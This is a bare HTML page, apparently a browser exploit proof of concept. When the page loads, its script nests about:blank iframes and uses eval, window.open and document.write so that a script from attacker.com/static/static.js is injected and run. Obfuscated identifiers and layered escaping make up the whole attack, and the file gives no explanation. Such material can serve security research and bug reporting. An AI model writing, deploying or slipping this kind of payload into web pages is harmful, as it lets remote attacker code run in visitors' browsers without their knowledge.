<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGPANBsGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGPANBsGGGGG.onload=_=>GGGGGPANBsGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGPANBsGGG src=about:blank><\/iframe><script>GGGPANBsGGG.onload=_=>GGGPANBsGGG.contentDocument.body.innerHTML+=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;GGGPANBsGGG.contentWindow.location.reload();<\/script>');");GGGGGPANBsGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>